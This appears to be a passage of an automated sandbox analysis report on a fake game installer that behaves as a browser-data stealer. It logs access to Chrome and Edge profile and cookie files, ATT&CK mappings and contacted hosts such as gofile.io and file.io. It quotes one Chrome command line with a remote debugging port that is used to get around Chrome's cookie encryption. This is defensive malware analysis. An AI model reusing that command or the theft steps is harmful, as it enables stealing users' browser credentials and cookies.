Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstLaunchAfterInstallation VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-wal VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\edge_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\edge_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\edge_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\edge_default_Cookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\all-files-KHkC0W VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\all-files-KHkC0W VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\all-files-KHkC0W VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\all-files.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0353475199 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0353475199 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0666563528 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1417002460 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4683256203 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5367203117 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5367203117 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5622580005 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5622580005 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5795694722 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5859486270 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5859486270 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5a9c282b-ef39-4af3-8fe8-5806dd03ee4a.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6516896632 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7011884383 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7011884383 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7245361316 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7606393495 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7606393495 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\77d22a10-bffc-4dc5-99e7-4fbb607cb190.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7838756049 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrocef_low VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B018D45B-96A4-4B60-BED4-BC78D47B50F2 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B018D45B-96A4-4B60-BED4-BC78D47B50F2 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B018D45B-96A4-4B60-BED4-BC78D47B50F2\en-US VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6D1.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6D1.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6E8.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE6E8.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE703.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE707.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE70B.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE70B.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE723.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE783.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE783.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE795.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE795.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7A7.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7A7.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7B8.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7B8.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7DB.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7EF.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7EF.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7F0.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TCDE7F1.tmp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldbJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldbJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.logJump to behavior

Remote Access Functionality

barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts211
Windows Management Instrumentation		1
Windows Service		1
Windows Service		11
Masquerading		1
OS Credential Dumping		21
Security Software Discovery		Remote Services1
Data from Local System		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		1
Registry Run Keys / Startup Folder		11
Process Injection		111
Disable or Modify Tools		LSASS Memory1
Network Service Discovery		Remote Desktop ProtocolData from Removable Media1
Remote Access Software		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		1
DLL Side-Loading		1
Registry Run Keys / Startup Folder		121
Virtualization/Sandbox Evasion		Security Account Manager2
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		11
Process Injection		NTDS121
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp		LSA Secrets1
Application Window Discovery		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
Remote System Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem34
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584251 Sample: Yoranis Setup.exe Startdate: 05/01/2025 Architecture: WINDOWS Score: 72 55 sb.scorecardresearch.com 2->55 57 ntp.msn.com 2->57 59 9 other IPs or domains 2->59 81 Drops large PE files 2->81 8 YoransSetup.exe 16 2->8         started        12 Yoranis Setup.exe 12 787 2->12         started        signatures3 process4 dnsIp5 67 api.gofile.io 94.139.32.3, 443, 49771, 51695 ENIX-ASFR Belgium 8->67 69 file.io 143.244.215.221, 443, 49772, 51696 COGENT-174US United States 8->69 71 2 other IPs or domains 8->71 83 Attempt to bypass Chrome Application-Bound Encryption 8->83 85 Suspicious powershell command line found 8->85 87 Tries to harvest and steal browser information (history, passwords, etc) 8->87 89 Excessive usage of taskkill to terminate processes 8->89 15 cmd.exe 8->15         started        17 cmd.exe 8->17         started        20 cmd.exe 8->20         started        24 59 other processes 8->24 47 C:\Users\user\AppData\...\YoransSetup.exe, PE32+ 12->47 dropped 49 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 12->49 dropped 51 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 12->51 dropped 53 34 other files (none is malicious) 12->53 dropped 22 cmd.exe 1 12->22         started        file6 signatures7 process8 dnsIp9 27 WMIC.exe 15->27         started        30 conhost.exe 15->30         started        77 Suspicious powershell command line found 17->77 39 2 other processes 17->39 41 2 other processes 20->41 32 conhost.exe 22->32         started        43 2 other processes 22->43 73 chrome.cloudflare-dns.com 172.64.41.3, 443, 49774, 50333 CLOUDFLARENETUS United States 24->73 75 239.255.255.250, 1900 unknown Reserved 24->75 79 Excessive usage of taskkill to terminate processes 24->79 34 curl.exe 24->34         started        37 msedge.exe 24->37         started        45 110 other processes 24->45 signatures10 process11 dnsIp12 91 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 27->91 93 Queries memory information (via WMI often done to detect virtual machines) 27->93 61 api.ipify.org 104.26.12.205, 49766, 80 CLOUDFLARENETUS United States 34->61 63 dns.quad9.net 9.9.9.9, 443, 49926, 51537 QUAD9-AS-1US United States 37->63 65 sb.scorecardresearch.com 18.173.166.9, 443, 55728 MIT-GATEWAYSUS United States 37->65 signatures13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.